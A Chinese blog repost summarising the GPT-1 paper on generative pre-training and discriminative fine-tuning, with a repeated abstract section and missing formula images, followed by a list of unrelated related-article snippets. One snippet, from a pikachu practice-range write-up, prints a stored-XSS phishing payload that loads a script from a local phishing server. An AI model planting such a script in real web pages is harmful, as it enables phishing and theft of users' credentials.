【论文速读】GPT-1：Improving Language Understanding by Generative Pre-Training

【论文速读】GPT-1：Improving Language Understanding by Generative Pre-Training

diannao/2025/11/5 12:58:13/文章来源:https://blog.csdn.net/weixin_43457608/article/details/139200290

摘要

自然语言理解包括广泛的不同的任务，如文本隐含、问题回答、语义相似性评估和文档分类。虽然大量的未标记文本语料库非常丰富，但用于学习这些特定任务的标记数据非常稀缺，这使得经过区别训练的模型要充分执行任务具有挑战性。我们证明，通过在不同的未标记文本语料库上对语言模型进行生成式预训练，然后对每个特定任务进行区分性微调，可以实现这些任务上的巨大收益。

构架

我们的训练过程包括两个阶段。第一阶段是在大型文本语料库上学习高容量语言模型。接下来是一个微调阶段，在那里我们使模型适应一个有标记数据的鉴别任务。

摘要

自然语言理解包括广泛的不同的任务，如文本隐含、问题回答、语义相似性评估和文档分类。虽然大量的未标记文本语料库非常丰富，但用于学习这些特定任务的标记数据非常稀缺，这使得经过区别训练的模型要充分执行任务具有挑战性。我们证明，通过在不同的未标记文本语料库上对语言模型进行生成式预训练，然后对每个特定任务进行区分性微调，可以实现这些任务上的巨大收益。

构架

我们的训练过程包括两个阶段。第一阶段是在大型文本语料库上学习高容量语言模型。接下来是一个微调阶段，在那里我们使模型适应一个有标记数据的鉴别任务。

在这里插入图片描述

（左）本工作中使用的Transformer架构和训练目标。（右）用于对不同任务进行微调的输入转换。我们将所有结构化的输入转换为令牌序列，由我们的预训练模型进行处理，然后是一个linear+softmax层。

无监督预训练

给定一个无监督的标记语料库 $U = \{u_1，…，u_n\}$ 我们使用一个标准的语言建模目标来最大化以下可能性：

在这里插入图片描述

k 上下文窗口大小，条件概率 P 采用参数为Θ的神经网络进行建模。这些参数采用随机梯度下降法进行训练。

架构使用multi-layer Transformer decoder的语言模型。该模型对输入上下文令牌进行多头自注意操作，然后进行位置级前馈层，以产生在目标令牌上的输出分布：

在这里插入图片描述

$U = (u - k, ..., u - 1)$ 为令牌的上下文向量，n为层数， $W_e$ 为令牌嵌入矩阵， $W_p$ 为位置嵌入矩阵。

有监督微调

在等式中对模型进行目标训练后，我们将参数适应于有监督的目标任务。我们假设有一个带有标记的数据集C，其中每个实例都包含一个输入标记序列， $x 1 ， \dots ， x m ，$ 以及一个标签y。输入通过我们预先训练的模型获得最终transformer block的激活 $h^m_l$ ，然后将其输入一个附加的线性输出层，参数 $W_y$ 来预测y：

在这里插入图片描述

这给了我们以下可以最大化的目标：

在这里插入图片描述

此外，我们还发现，将语言建模作为微调的辅助目标有助于

(a)学习，改进监督模型的泛化，以及

(b)加速收敛。

具体来说，我们优化了以下目标（weight为λ）：

在这里插入图片描述

特定的输入转换

所有的转换都包括添加随机初始化的开始标记和结束标记(<s>, <e>)，中间有一个分隔符标记（$）

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/diannao/15300.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

Ubuntu（22.04）不能上网解决办法

Ubuntu（22.04）不能上网解决办法

想必大家可能在别的贴子看到用以下指令的方法，但是在22版本的ubuntu是行不通的，问题在于22版本中网络管理器的名字压根不是network-manager，而是 NetworkManager. sudo service network-manager stop sudo rm /var/lib/NetworkManager/Netw…

阅读更多...

短剧APP开发，短剧行业发展下的财富密码

短剧APP开发，短剧行业发展下的财富密码

今年以来，短剧市场展现出了繁荣发展的态势，成为了一个风口赛道。短剧具有不拖沓、时长短、剧情紧凑等优势，顺应了当代人的生活，是当代人的“电子榨菜”。短剧的快速发展同时也带动了新业态新模式的发展，短剧APP就是…

阅读更多...

ClickHouse vs. Elasticsearch: 计数聚合的工作原理

ClickHouse vs. Elasticsearch: 计数聚合的工作原理

本文字数：7875；估计阅读时间：20 分钟审校：庄晓东（魏庄） 介绍在另一篇博客文章中，我们对 ClickHouse 和 Elasticsearch 在大规模数据分析和可观测性用例中的性能进行了比较，特别是对…

阅读更多...

GitLab的原理及应用详解（三）

GitLab的原理及应用详解（三）

本系列文章简介：随着软件开发的不断进步和发展，版本控制系统成为了现代软件开发过程中不可或缺的一部分。而GitLab作为其中一种流行的版本控制工具，在软件开发领域享有广泛的应用。GitLab不仅提供了强大的版本控制功能，还集成了项目管理、持续集成和部署、代码审查等多个功…

阅读更多...

python-找出四位数中的玫瑰花数

python-找出四位数中的玫瑰花数

【问题描述】玫瑰花数指一个n位数（n>4),其每位上的数字的n次幂之和等于本身。请求出所有四位数中的玫瑰花数【输入形式】【输出形式】【样例输入】【样例输出】1634 8208 9474 【样例说明】【评分标准】完整代码如下： for n in ra…

阅读更多...

《计算机网络微课堂》1-2：因特网概述

《计算机网络微课堂》1-2：因特网概述

1-2：因特网概述网络、互连网（互联网）和因特网因特网发展的三个阶段因特网的标准化工作因特网的组成 ‍ 网络、互连网（互联网）和因特网我们首先介绍网络、互联网（互连网）因特网的基本概念&a…

阅读更多...

ensp-三层交换技术

ensp-三层交换技术

交换机-三层交换一.概述单臂路由有明显的缺陷,单臂路由的链路使用率高,可能会造成网路拥塞,造成网络不可用可以让多个交换机连接路由器的不同接口,但是路由器的接口毕竟有限,不像交换机一样有那么多接口使用三层交换解决路由器接口不够用问题二.三层交换 1.创建多个VLAN…

阅读更多...

魔众文库系统v6.6.0分销功能，后台日志重构，文档转换优化

魔众文库系统v6.6.0分销功能，后台日志重构，文档转换优化

分销功能，后台日志重构，文档转换优化 [新功能] 升级支持支付宝授权登录最新方式 [新功能] 后台左上角标题支持自定义，修改 modstart.php 中 admin.title 配置 [新功能] 日志界面重构，全新日志查看体验 [新功能] 链接选择弹窗增…

阅读更多...

学习笔记——交通安全分析01

学习笔记——交通安全分析01

目录前言当天学习笔记整理绪论结束语前言 #随着上一轮SPSS学习完成之后，本人又开始了新教材《交通安全分析》的学习 #整理过程不易，喜欢UP就点个免费的关注趴当天学习笔记整理绪论交通事故每年造成高达135万人死亡，是致人死…

阅读更多...

idea 出现 cpu占用100%

idea 出现 cpu占用100%

一、IDEA的CPU占用率过高二、解决办法 idea安装路径bin目录修改idea64.exe.vmoptions配置文件原来的 -Xms128m -Xmx750m -XX:ReservedCodeCacheSize240m -XX:UseConcMarkSweepGC -XX:SoftRefLRUPolicyMSPerMB50 修改为(IDEA优化内存配置) -Xms2048m -Xmx4096m -XX:Reser…

阅读更多...

Android 项目中自定义多个 RadioButton 并排一列选择效果实现

Android 项目中自定义多个 RadioButton 并排一列选择效果实现

文章目录 1、静态版实现1.1、实现要求1.2、实现步骤1.3、代码实现1.4、代码实现说明1.5、结论 2、项目版实现(动态)1、先看效果图2、main的布局文件3、定义RadioButton的属性4、最后在代码中生成我想要的东东5、说明 3、后续优化方向 1、静态版实现 1.1、实现要求我们需要在…

阅读更多...

1、pikachu靶场之xss钓鱼复现

1、pikachu靶场之xss钓鱼复现

一、复现过程 1、payload <script src"http://127.0.0.1/pkxss/xfish/fish.php"></script> 将这段代码插入到含有储存xss的网页上，如下留言板 2、此时恶意代码已经存入数据库，并存在网页中，当另一个用户打开这个网页…

阅读更多...

SK6812-RGBW是一个集控制电路与发光电路于一体的智能外控LED光源

SK6812-RGBW是一个集控制电路与发光电路于一体的智能外控LED光源

产品概述: SK6812-RGBW是一个集控制电路与发光电路于一体的智能外控LED光源。其外型与一个5050LED灯珠相同，每个元件即为一个像素点。像素点内部包含了智能数字接口数据锁存信号整形放大驱动电路，电源稳压电路，内置恒流电路&#xff0…

阅读更多...

牛客101

牛客101

1、用两个栈实现队列、 import java.util.Stack;public class Solution {Stack<Integer>stack1new Stack<Integer>();Stack<Integer>stack2new Stack<Integer>();public void push(int node){stack1.push(node);}public int pop(){while(!stack1.isEmp…

阅读更多...

质数和约数

质数和约数

试除法判定质数问题描述给定 n 个正整数 ai，判定每个数是否是质数。输入格式第一行包含整数 n。接下来 n 行，每行包含一个正整数 ai。输出格式共 n 行，其中第 i 行输出第 i 个正整数 ai 是否为质数，是则输出 Yes&am…

阅读更多...

黄金价格创新高，交易风险提示

黄金价格创新高，交易风险提示

在全球经济格局中，黄金一直被视为避险资产，尤其在美联储降息预期逐步兑现以及地缘政治不确定性上升的背景下，投资者纷纷寻求安全资产。近期，上海黄金交易所针对黄金价格的异常波动，向市场参与者发出了交易风险提示&…

阅读更多...

从 0 开始本地部署大语言模型

从 0 开始本地部署大语言模型

1、准备 ● Ollama：ollama.com ● Docker：https://docs.openwebui.com/ 2、下载 Ollama 进入 Ollama 官网，点击 Download 。下载完成后，双击安装，什么都不需要勾选，直接下一步即可。安装完成&#xf…

阅读更多...

PYQT5点击Button执行多次问题解决方案(亲测)

PYQT5点击Button执行多次问题解决方案(亲测)

PYQT5点击Button却执行多次问题使用pyqt5时遇到问题，UI上按钮点击一次，对应的槽函数却执行了3遍首先，确认函数名无冲突，UI button名无命名冲突，下图是简单的示例程序： 运行后，点击按钮&#…

阅读更多...

electron调试自动更新，不触发下载进度解决方案

electron调试自动更新，不触发下载进度解决方案

调试时候删除掉后缀是.blockmap的文件。如果你的代码在改动不大的情况下发布一个新版本。那个安装器可能会根据这个数据自动合成一个包，而不走网络路径。从而不触发下载进度。

阅读更多...

什么是js

什么是js

JavaScript（通常缩写为JS）是一种轻量级的编程语言，它是一种实现网页交互性的客户端脚本语言。JavaScript 与 HTML 和 CSS 并列，是构建和开发网页和网页应用程序的三大核心技术之一。 JavaScript 可以用于创建动态的网页内容&#…

阅读更多...

最新文章